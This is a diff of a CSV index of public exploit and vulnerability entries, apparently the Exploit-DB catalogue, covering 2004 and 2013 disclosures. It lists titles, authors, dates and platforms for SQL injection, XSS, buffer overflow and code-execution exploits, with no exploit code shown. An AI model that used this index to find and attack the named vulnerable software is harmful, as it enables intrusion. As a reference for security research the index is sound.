Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader (catalog.php id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 +24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0 -24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yal?n",windows,dos,0 +24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 +24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yalçın",windows,dos,0 24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 @@ -21633,9 +21665,11 @@ id,file,description,date,author,platform,type,port 24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow Vulnerability",2013-02-11,Volema,linux,dos,0 +24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script (index.php id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,metasploit,windows,remote,0 -24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability",2013-02-13,LiquidWorm,php,webapps,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX Telnet Authorization Bypass",2013-02-14,"Paul Haas",hardware,remote,23 +24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)",2013-02-14,"Scott Bell",windows,remote,0 24496,platforms/windows/webapps/24496.txt,"Sonicwall Scrutinizer 9.5.2 - SQL Injection Vulnerability",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 @@ -21644,40 +21678,34 @@ id,file,description,date,author,platform,type,port 24500,platforms/windows/webapps/24500.txt,"Sonicwall OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 24501,platforms/php/webapps/24501.txt,"Ultra Light Forum Persistant XSS Vulnerability",2013-02-14,"cr4wl3r ",php,webapps,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin URL Processing Buffer Overflow",2013-02-14,metasploit,windows,remote,0 -24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"chillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php, L param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script (index.php, id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader (catalog.php, id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 -24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites (out.php, id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites (out.php id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php, cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 -24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 +24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 -24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 +24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 -24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0 +24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php, title param) - XSS Vulnerability",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php title param) - XSS Vulnerability",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 @@ -21697,7 +21725,7 @@ id,file,description,date,author,platform,type,port 24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional Authentication Bypass Vulnerability",2004-09-02,"Paul Craig",php,webapps,0 24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting Vulnerability",2004-09-02,Exoduks,php,webapps,0 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability",2004-09-03,"Alexander Kornbrust",multiple,remote,0 -24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6,KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 +24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6_KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24569,platforms/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",linux,dos,0 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 Path Environment Variable Local Command Execution Vulnerability",2004-09-03,"Julio Cesar Fort",linux,local,0 24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow Vulnerability",2004-09-03,celebrityhacker,windows,remote,0 @@ -21706,6 +21734,11 @@ id,file,description,date,author,platform,type,port 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 No Parameter Cross-Site Scripting Vulnerability",2004-09-05,"Michal Blaszczak",php,webapps,0 24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass Vulnerability",2004-09-07,anonymous,cgi,webapps,0 +24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 +24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 +24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 +24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 +24634,platforms/windows/remote/24634.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)",2004-09-27,Coolio,windows,remote,0 24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,metasploit,osx,local,0 24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service Vulnerability",2013-03-05,"Marc Heuse",windows,dos,0 @@ -21730,6 +21763,7 @@ id,file,description,date,author,platform,type,port 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 24600,platforms/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal Vulnerability",2004-09-15,scrap,windows,remote,0 24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 +24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 APPEND Variable Cross-Site Scripting Vulnerability",2004-11-03,Procheckup,cgi,webapps,0 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0 @@ -21757,10 +21791,6 @@ id,file,description,date,author,platform,type,port 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 -24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 -24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 -24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 -24634,platforms/windows/remote/24634.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)",2004-09-27,Coolio,windows,remote,0 24635,platforms/windows/remote/24635.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2)",2004-09-27,Coolio,windows,remote,0 24636,platforms/windows/remote/24636.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3)",2004-09-27,"Ken Hollis",windows,remote,0 24637,platforms/windows/remote/24637.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4)",2004-09-27,"Ken Hollis",windows,remote,0 @@ -21821,6 +21851,8 @@ id,file,description,date,author,platform,type,port 24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 HTML Injection Vulnerability",2004-10-19,PuWu,php,webapps,0 24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability",2004-10-20,http-equiv,windows,remote,0 24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0 +24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 +24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 @@ -21831,8 +21863,11 @@ id,file,description,date,author,platform,type,port 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0 24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0 +24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 +24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0 +24890,platforms/windows/remote/24890.rb,"ActFax 5.01 RAW Server Buffer Overflow",2013-03-26,metasploit,windows,remote,0 24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24711,platforms/php/remote/24711.php,"PHP 4.x/5 cURL Open_Basedir Restriction Bypass Vulnerability",2004-10-28,FraMe,php,remote,0 24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 @@ -21843,22 +21878,21 @@ id,file,description,date,author,platform,type,port 24717,platforms/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps,0 24718,platforms/php/webapps/24718.txt,"Goolery 0.3 viewpic.php conversation_id Parameter XSS",2004-11-02,Lostmon,php,webapps,0 24719,platforms/php/webapps/24719.txt,"Goolery 0.3 viewalbum.php page Parameter XSS",2004-11-02,Lostmon,php,webapps,0 -24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 -24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 APPEND Variable Cross-Site Scripting Vulnerability",2004-11-03,Procheckup,cgi,webapps,0 +24921,platforms/php/webapps/24921.txt,"OpenCart - Change User Password CSRF Vulnerability",2013-04-08,"Saadi Siddiqui",php,webapps,0 24722,platforms/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 Error Message Cross-Site Scripting Vulnerability",2004-11-03,Procheckup,cgi,webapps,0 24723,platforms/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration Vulnerability",2004-11-03,"Gemma Hughes",cgi,webapps,0 24724,platforms/multiple/remote/24724.c,"Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",multiple,remote,0 24725,platforms/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure Vulnerability",2004-11-05,DokFLeed,multiple,remote,0 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 -24728,platforms/windows/remote/24728.txt,"Internet Explorer 6.0, Firefox 0.x,Netscape 7.x IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 +24728,platforms/windows/remote/24728.txt,"Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x FOLLOW.PHP SQL Injection Vulnerability",2004-11-11,"Janek Vind",php,webapps,0 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service Vulnerability",2004-11-12,"Luigi Auriemma",windows,dos,0 -24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 send.php tid Parameter XSS",2004-11-12,"digital ex",php,webapps,0 -24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 +24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - send.php tid Parameter XSS",2004-11-12,"digital ex",php,webapps,0 +24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 User Module HTTP Response Splitting Vulnerability",2004-11-04,"Maestro De-Seguridad",php,webapps,0 24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service Vulnerability",2004-11-13,class101,windows,dos,0 @@ -21887,6 +21921,7 @@ id,file,description,date,author,platform,type,port 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0 +24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0 24768,platforms/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module record Parameter SQL Injection",2004-11-23,"James Bercegay",php,webapps,0 @@ -21906,7 +21941,9 @@ id,file,description,date,author,platform,type,port 24782,platforms/php/webapps/24782.txt,"PHPCMS 1.1/1.2 - Cross-Site Scripting Vulnerability",2004-11-26,"Cyrille Barthelemy",php,webapps,0 24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal Vulnerability",2004-11-26,"John Cobb",php,webapps,0 24784,platforms/linux/remote/24784.txt,"File ELF 4.x Header Unspecified Buffer Overflow Vulnerability",2004-11-29,anonymous,linux,remote,0 +24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash PoC",2013-03-15,metacom,windows,dos,0 24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 +24813,platforms/linux/remote/24813.pl,"gnu wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash PoC",2013-03-15,"John Cobb",windows,dos,0 24789,platforms/php/webapps/24789.rb,"WordPress LeagueManager Plugin 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps,0 24790,platforms/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,php,webapps,0 @@ -21918,7 +21955,7 @@ id,file,description,date,author,platform,type,port 24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Remote Directory Traversal Vulnerability",2004-12-02,"Steve Kemp",php,webapps,0 24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting Vulnerability",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 Error Message Path Disclosure Vulnerability",2004-12-04,y3dips,php,webapps,0 -24799,platforms/multiple/dos/24799.txt,"Mozilla0.x,Netscape 3/4,Firefox 1.0 JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 +24799,platforms/multiple/dos/24799.txt,"Mozilla0.x_Netscape 3/4_Firefox 1.0 JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 24801,platforms/linux/remote/24801.txt,"KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution Vulnerability",2004-12-06,"Albert Puigsech Galicia",linux,remote,0 24802,platforms/windows/remote/24802.txt,"Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection Vulnerability",2004-12-07,"Gregory R. Panakkal",windows,remote,0 @@ -21931,8 +21968,6 @@ id,file,description,date,author,platform,type,port 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service Vulnerability",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x Descendancy.PHP Cross-Site Scripting Vulnerability",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 FSMSH.DLL CGI Application Installation Path Disclosure Vulnerability",2004-12-09,oliver@greyhat.de,windows,remote,0 -24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash PoC",2013-03-15,metacom,windows,dos,0 -24813,platforms/linux/remote/24813.pl,"gnu wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 Index.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow Vulnerability",2004-12-10,"Luigi Auriemma",linux,dos,0 24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 Individual.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 @@ -21952,6 +21987,8 @@ id,file,description,date,author,platform,type,port 24830,platforms/php/webapps/24830.txt,"PhpGedView 2.5/2.6 Login.PHP Username Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PhpGedView 2.5/2.6 Login.PHP Newlanguage Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PhpGedView 2.5/2.6 Relationship.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24852,platforms/linux/remote/24852.txt,"MPG123 0.59 Find Next File Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Bartlomiej Sieka",linux,remote,0 +24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 MMST Get_Header Remote Client-Side Buffer Overflow 